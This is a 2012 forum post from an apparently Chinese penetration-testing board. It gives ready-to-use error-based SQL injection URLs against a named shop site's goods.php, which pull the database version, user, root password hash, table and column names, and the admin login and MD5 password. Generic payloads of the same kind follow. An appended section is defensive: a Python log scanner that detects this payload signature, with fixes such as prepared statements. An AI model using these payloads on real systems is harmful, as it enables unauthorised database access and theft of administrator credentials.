中国网络渗透测试联盟

Title: Blind injection details

Author: admin    Time: 2012-9-5 14:59
Title: Blind injection details

Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23


Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table names

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23


Current database: user_name column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database: password column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
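Every payload in the post above is the same construction: count(*) aggregated over a concat() that carries the leaked value, floor(rand()*2) as the colliding GROUP BY key, so that the database fails with a duplicate-entry error that echoes the value back. That fixed shape is what a defender can key on. The following log-scanning script is an added example, not part of the original post; it flags requests carrying that signature in web-server access logs. The log lines, client addresses, timestamps and request paths are constructed placeholders.

```python
"""Flag error-based (floor(rand()*2) / GROUP BY duplicate-key) SQL injection
attempts in combined-format access logs. Added example; the sample lines below
are constructed, not real traffic."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines (Apache/Nginx combined log format). Addresses,
# timestamps and paths are placeholders. The last line is double URL-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Sep/2012:14:59:01 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120
203.0.113.7 - - [05/Sep/2012:14:59:03 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 312
198.51.100.9 - - [05/Sep/2012:15:00:10 +0800] "GET /goods.php?id=12 HTTP/1.1" 200 4870
203.0.113.7 - - [05/Sep/2012:15:01:44 +0800] "GET /goods.php?id=352&wsid=1%2520and%2520(select%25201%2520from(select%2520count(*),concat((select%2520database()),floor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a) HTTP/1.1" 500 330
"""

# Combined log format: ip ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>.*?) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# All four parts must be present after normalisation: the aggregate, the
# concat() carrying the leaked value, floor(rand()*2) as the colliding key,
# and a GROUP BY on that key.
SIGNATURE = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    re.compile(r"\bgroup\s+by\b"),
    re.compile(r"\bcount\s*\(\s*\*\s*\)"),
    re.compile(r"\bconcat(?:_ws)?\s*\("),
]


def normalize(url: str) -> str:
    """URL-decode up to three layers (catches double encoding), strip inline
    SQL comments used to split keywords, fold whitespace and case."""
    s = url
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()


def is_error_based_injection(url: str) -> bool:
    """True when the normalised request carries the full duplicate-key pattern."""
    q = normalize(url)
    return all(p.search(q) for p in SIGNATURE)


def scan_log(text: str) -> list:
    """Return one finding per matching request: who, when, response code, and
    the decoded query for the analyst."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_error_based_injection(m.group("url")):
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "query": normalize(m.group("url")),
            })
    return findings


def count_by_ip(findings: list) -> dict:
    """Attempts per source address, for triage and blocking decisions."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['time']} {f['ip']} status={f['status']} {f['query'][:80]}")
    print(count_by_ip(hits))
```

In the constructed sample both flagged requests returned HTTP 500, which is what this technique produces when the server surfaces the duplicate-entry error; correlating the URL signature with a 5xx status and a "Duplicate entry" message in the database or PHP error log keeps false positives low. The decode loop matters because the fourth line is double-encoded and would pass a single-decode filter. On the application side the root cause in goods.php-style code is string concatenation of `id` and `wsid` into the query; casting numeric parameters to integers or using prepared statements removes the injection point entirely.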




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2